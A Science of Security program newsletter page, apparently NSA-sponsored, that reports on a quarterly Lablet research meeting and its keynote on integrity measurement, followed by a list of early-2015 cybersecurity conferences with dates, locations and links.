Members of the Research Directorate at NSA, the program’s sponsor, began the talks. Orville Stockland, Special Assistant for Novel Research Partnership Strategies, Trusted Systems Research Group, greeted the assembled researchers and encouraged them both to share the results of their research throughout the community and to make their students aware of the many government resources available to them online. StephanieStephanie Yannacci, Science of Security Program Manager, provided an SoS program update and described the core elements of the Science of Security Program noting how the Lablets, the HOT SoS conference, the annual paper competition and the CPS-VO web page mesh to offer communication and information sharing among the members of the Science of Security community. StuartStuart Krohn, SoS Technical Director, described the progress the Lablets are making. He relayed a presentation given by Dan Geer at the National Science Foundation’s SaTC Principal Investigators’ meeting about Science of Security based on Thomas Kuhn’s work, “The Structure of Scientific Revolutions.” He noted that NIST, NSF, DHS and NSA all presented Science of Security briefings to the National Academy of Science, and that NSA's work reflected a stricter definition of foundational: Basic scientific tenets in the multi-disciplinary areas of security upon which we can base trust. Krohn explained the selection process for the annual best paper award and noted the SoS Virtual Organization now numbers more than 500 individuals and that sub-Lablet research partners have expanded the SoS community globally.

Pete Loscocco of NSA presented the keynote address, “Integrity Measurement: The Way Ahead, Knowing if your Systems have been Altered”. He outlined issues and solutions on the use of integrity measurement as a tool to achieve trusted computing. The broad goal, he stated, is to secure systems, but we are falling short of the ideal. Software cannot sufficiently protect systems from attack, and the question of remote trust remains unanswered. Integrity measurement can be useful in bridging the gap between traditional concepts—that is, if the design and implementation of a system are correct, it is “secure”—and the reality of network security. Loscoco described prototypes of Integrity Measurement currently in use and characterized it as a tool that augments existing systems and is useful for detecting trust issues. The large issue, he says, is that trust decisions require system integrity to preserve trust, and that evidence is required to test the trust attestations that are rooted in trustworthy mechanisms. Using load time and run time, the process effectively allows scalability to trust relationships anywhere on the network, can adapt to changing requirements and can project trust across domains using currently available technologies.

Lablet ResearcherIndividual researchers from each Lablet and their teams presented materials from their work addressing the five Hard Problems in cybersecurity. Lablet ResearcherCarnegie-Mellon’s Lablet presented current research on security risk perception in composable systems and on analyzing highly configurable systems. Preemptive intrusion detection and hypothesis testing for network security were the topics presented by the University of Illinois. Maryland contributed presentations on a trust-aware social recommender system design and on remote voting protocols. Host NC State presented an objective resiliency analysis of smart grid systems and a discussion of systematizing isolation techniques. In addition, 16 research posters were presented and NCSU presented their work on analysis of bibliometrics applied to Science of Security publications. Jeff Carver of the University of Alabama (working in cooperation with the NCSU lablet) presented an interactive exercise that presented a rubric for teams to determine if a specific research paper showed scientific value and rigor.
 

The next quarterly meeting will be held April 21 and 22, 2015 at the University of Illinois Urbana Champaign in conjunction with HOT SoS 2015.

(ID#:14-3364)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Upcoming Events

Upcoming Events



Mark your calendars! This section features a wide variety of upcoming security-related conferences, workshops, symposiums, competitions, and events happening in the United States and the world. This list also includes several past events with links to proceedings or summaries of the actual activities.

Note: The events may also be found on the SoS Calendar, located by clicking the 'Calendar' tab on the left-hand navigation bar.


NEDForum London
This event's topic is "What Can We Learn from the Darknet", with applications to threat intelligence, attack detection, and commercial. Though Darknet presents a threat to companies, law, individuals, and society, some are seeing the profitable side to Darknet, such as Facebook and their recently opened Darknet site. The conference will feature many speaker sessions and a panel discussion. (ID# 14-70093)
Event Date: Fri 1/30/15
Location: Central London, UK
URL: http://www.nedforum.com/

Suits and Spooks
This event invites security leaders from public, private, defense, law enforcement, and intelligence to attend and engage in discussion about the most current security challenges. The limited audience makes this conference unique, and offers an environment for peers to engage, discuss, network, and debate the key issues in cybersecurity. This event will feature workshops, panel discussions, presentations, and more. Issues to be discussed include cryptocurrencies, Ukraine's role in cyberwarfare, the Sony hack, and more. (ID# 14-70094)
Event Date: Wed 2/4/15 - Thurs 2/5/15
Location: Ritz Carlton Hotel, Washington D.C.
URL: http://www.suitsandspooks.com/#!washington-dc-2015/c1c61
ICSS 2015

Organized by the B-CCentre (Belgian Cybercrime Centre of Excellence for Training, Research, and Education) and KU Leuven, this event presents high level key speakers, as well as latest developments and innovations in the field of cybersecurity. Experts from the police, Cybercrime Centres of Excellence, and European member state magistrates have been invited. (ID# 14-70095)
Event Date: Wed 2/4/15 - Thurs 2/5/15
Location: Leuven, Belgium
URL: https://www.icss2015.eu/

Salt Lake City Tech-Security Conference
This conference invites industry experts and peers to engage in current security issues, topics including email security, VoIP, LAN security, wireless security, USB drives security, and more. 25-30 vendor exhibits will be presents, and the conference features speaker sessions, networking opportunities, and giveaways. (ID# 14-70096)
Event Date: Thurs 2/5/15
Location: Salt Lake City, Utah
URL: http://dataconnectors.com/upcoming-events-and-agendas/58-salt-lake-city-tech-security-conference-2015

UK Energy Cyber Security Executive Forum
This event invites CEOs, CISOs, Heads of Digital Risk, CIOs, Chief Risk Officers, and risk personnel to join the discussion about cyber threats to the energy sector. This strategic and practice-driven summit focuses on risk minimization, standards, resiliency, and more. Topics include cybercrime in the oil and gas industry, management of data security breaches, and more. (ID# 14-70097)
Event Date: 2/5/14
Location: London, England
URL: http://www.cityandfinancialconferences.com/events/the-uk-energy-cyber-security-executive-forum/event-summary-9aafa64a262c40f28f71a18f8cdd0147.aspx?inf_contact_key=5e4aea209b3cbcf6eb197ef83a5d8d28d0066d203429cb176a6adf28999c59c5

ICISSP 2015
The International Conference on Information Systems Security and Privacy invites industry leaders, security researchers, academics, and practitioners to collaborate on the technical and social challenges in privacy and security today. The conference areas are divided into categories: Data and Software Security, Trust, Privacy and Confidentiality, Mobile Systems Security, and Biometric Authentication. The events will feature keynote speakers, demos, tutorials, paper presentations, and more. (ID# 14-70098
Event Date: Mon 2/9/15 -Wed 2/11/15
Location: ESEO, Angers, Loire Valley, France
URL: http://www.icissp.org/Home.aspx

2015 Cyber Risk Insights Conference
This event features an expert panel of leaders in network security, regulation, law, risk management, and cyber risk assurance. This event encourages risk managers, CISOs, CROs, underwriters, reinsurers, and other risk professionals to participate in this collaborative learning experience. (ID# 14-70099)
Event Date: Tues 2/10/15
Location: The Willis Building, London, England
URL: http://www.advisenltd.com/events/conferences/2015/02/10/2015-cyber-risk-insights-conference-london/

AFCEA West 2015
This three-day event is known as the premier Sea Services event with particular interest in Asia-Pacific operations. This event will feature emerging systems, platforms, technologies, and networks. This event is sponsored by SAIC, Oracle, Samsung, Northrop Grumman, and more, and is free to all military and government personnel. (ID# 14-70100)
Event Date: Tues 2/10/15 - Thurs 2/12/15
Location: San Diego, CA
URL: http://events.jspargo.com/West15/public/enter.aspx

10th Annual ICS Security Summit
This summit is designed to be a learning experience, featuring workshops and seminars with industry experts on attacker techniques, testing approaches in ICS, and defense capability in ICS environments. The summit will offer hands-on training courses. (ID# 14-70101)
Event Date: Sun 2/22/15 - Fri 3/2/15
Location: Orlando, FL
URL: http://www.sans.org/event/ics-security-summit-2015

Connected World 2015
In partnership with the University of Alabama at Birmingham's center for Information Assurance and Join Forensics Research, this conference invites industry leaders, government, and academia. This conference will include notable speakers, exhibits, and discussions concerning security and connected devices. (ID# 14-70102)
Event Date: Mon 2/23/15 - Tues 2/24/15
Location: Birmingham Marriott, Alabama
URL: http://connectedworld.com/conference/

BSidesNOLA 2015
Join fellow pentesters and security experts in NOLA for the BSides NOLA conference. Individuals are invited to present and participate in discussions, demos, conversation, speaker sessions, and more with information security community members. This year, Chris Rohlf, head of penetration testing efforts inside Yahoo, will be speaking on large-scale offensive computer operations. (ID# 14-70103)
Event Date: Sat 5/30/15
Location: Hilton Garden Inn New Orleans Convention Center, New Orleans LA
URL: http://www.securitybsides.com/w/page/91550808/BSidesNOLA

(ID#:14-3362)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.